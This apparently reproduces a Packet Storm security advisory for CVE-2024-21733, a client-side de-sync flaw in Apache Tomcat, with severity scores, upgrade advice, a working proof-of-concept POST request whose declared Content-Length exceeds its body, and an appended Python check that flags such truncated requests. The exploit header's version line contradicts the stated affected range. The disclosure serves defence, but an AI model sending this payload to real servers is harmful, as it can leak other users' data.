Packet Storm PACKETSTORM:176951 (xer0dayz, sn1persecurity.com), Feb 01, 2024 - 12:00 a.m.

Apache Tomcat 8.5.63 / 9.0.43 HTTP Response Smuggling

Published: 2024-02-01 00:00:00
Author: xer0dayz, sn1persecurity.com
Source: packetstormsecurity.com
Tags: apache tomcat, http response smuggling, cve-2024-21733, security advisory, upgrade

CVSS3: 5.3 Medium
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- Attack Vector: NETWORK
- Attack Complexity: LOW
- Privileges Required: NONE
- User Interaction: NONE
- Scope: UNCHANGED
- Confidentiality Impact: LOW
- Integrity Impact: NONE
- Availability Impact: NONE

AI Score: 7.4 High (Confidence: Low)

CVSS2: 5 Medium
- Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
- Access Vector: NETWORK
- Access Complexity: LOW
- Authentication: NONE
- Confidentiality Impact: PARTIAL
- Integrity Impact: NONE
- Availability Impact: NONE

EPSS: 0.003 Low (Percentile: 63.3%)

```text
# Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling
# Date: 1/31/2024
# Exploit Author: xer0dayz
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/
# Version: 8.5.7 to 8.5.63 or 9.0.44 or later
# CVE : CVE-2024-21733
```

## Description:
Apache Tomcat versions 8.5.7 through 8.5.63 and 9.0.0-M11 through 9.0.43 are vulnerable to client-side de-sync attacks.

Client-side de-sync (CSD) vulnerabilities occur when a web server fails to correctly process the Content-Length of POST requests. By exploiting this behavior, an attacker can force a victim's browser to de-synchronize its connection with the website, causing sensitive data to be smuggled from the server and/or client connections.

## Remediation:
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.

## Credit:
This vulnerability was reported responsibly to the Tomcat security team by xer0dayz from Sn1perSecurity LLC.

## History:
2024-01-19 Original advisory

## Full Security Advisory: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz

## Full Write-Up: https://sn1persecurity.com/wordpress/cve-2024-21733-apache-tomcat-http-request-smuggling/

## PoC/Exploit:

```http
POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded

X
```
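As an added example (not part of the advisory and not Tomcat code), the Python check below flags the condition the PoC exercises: a POST whose body is shorter than its declared Content-Length, which a server must reject for that request alone rather than mixing it with another request on the connection. It parses a raw HTTP/1.1 request from bytes; the sample request is constructed from the PoC's relevant headers, and `hostname` is the PoC's own placeholder.

```python
import re

# Constructed sample: the advisory's PoC request, reduced to the headers that
# matter. Content-Length claims 6 bytes but only 1 byte ("X") follows.
POC_REQUEST = (b"POST / HTTP/1.1\r\nHost: hostname\r\nConnection: keep-alive\r\n"
               b"Content-Length: 6\r\nContent-Type: application/x-www-form-urlencoded\r\n"
               b"\r\nX")

def split_request(raw):
    """Return (request line, [(lowercased name, value)], body); duplicate
    header fields stay visible in the list."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("header block is itself incomplete")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0].decode("ascii", "replace"), headers, body

def declared_length(headers):
    """Body length the server will honour: None when chunked framing applies,
    else the single Content-Length (conflicting copies are an error, RFC 9112)."""
    if any(n == b"transfer-encoding" and b"chunked" in v.lower() for n, v in headers):
        return None
    values = {v for n, v in headers if n == b"content-length"}
    if len(values) > 1:
        raise ValueError("conflicting Content-Length values")
    if not values:
        return 0
    (value,) = values
    if not re.fullmatch(rb"[0-9]+", value):
        raise ValueError("malformed Content-Length")
    return int(value)

def check_body(raw):
    """Compare declared and received body bytes. 'incomplete' is True when the
    body is truncated: a hardened server must fail only this request and never
    answer it with data belonging to another request on the connection."""
    request_line, headers, body = split_request(raw)
    declared = declared_length(headers)
    if declared is None:
        return {"request": request_line, "incomplete": False, "framing": "chunked"}
    return {"request": request_line, "declared": declared,
            "received": len(body), "incomplete": len(body) < declared}
```

Running `check_body(POC_REQUEST)` reports 6 bytes declared against 1 received; the same function is a convenient fixture for confirming that a patched 8.5.64 or 9.0.44 server answers such a request with an error rather than with stale data.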
